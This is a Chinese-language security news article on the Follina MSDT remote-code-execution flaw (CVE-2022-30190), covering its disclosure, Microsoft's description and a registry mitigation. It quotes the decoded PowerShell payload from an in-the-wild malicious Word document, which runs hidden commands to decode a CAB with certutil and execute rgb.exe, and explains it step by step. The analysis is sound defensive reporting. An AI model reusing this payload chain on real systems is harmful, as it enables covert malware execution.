Windows 的支持诊断工具 (Microsoft Windows Support Diagnostic Tool, MSDT) 被曝出存在高危的 0day 漏洞,代号 "Follina",可被用于在 Windows 系统中远程执行代码。
该漏洞最初由 Shadow Chaser Group 的研究人员于 4 月首次发现并报告给微软,并证明该漏洞已被黑客利用进行攻击。这名研究人员表示,微软最初将该漏洞标记为不是“与安全相关的问题”,但后来又以存在远程代码执行漏洞为由关闭了漏洞提交报告。因此,这个早已被发现的漏洞近日才被标上编号:CVE-2022-30190。
微软对此漏洞的描述如下:
“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户。”
根据研究员 Kevin Beaumont 的分析,包含攻击媒介的文档会使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。虽然在理论上这不太可能实现,但事实上确实可以做到。当文档中的命令被解码时,它们会转换为:
$cmd ="c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
脚本的实现原理为:
在隐藏窗口运行以下操作
1. 如果 msdt.exe 正在运行,则终止它
2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串
3. 将此 Base64 编码的 CAB 文件存储为 1.t
4. 解码 Base64 编码的 CAB 文件保存为 1.c
5. 将 1.c CAB 文件展开到当前目录,最后:
6. 执行 rgb.exe(大概压缩在 1.c CAB 文件里面)
目前微软尚未发布修复此漏洞的补丁,不过提供了缓解措施来禁用 MSDT URL 协议:
1. 以管理员身份运行命令提示符
2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOT\ms-msdt filename”
3. 执行命令“reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
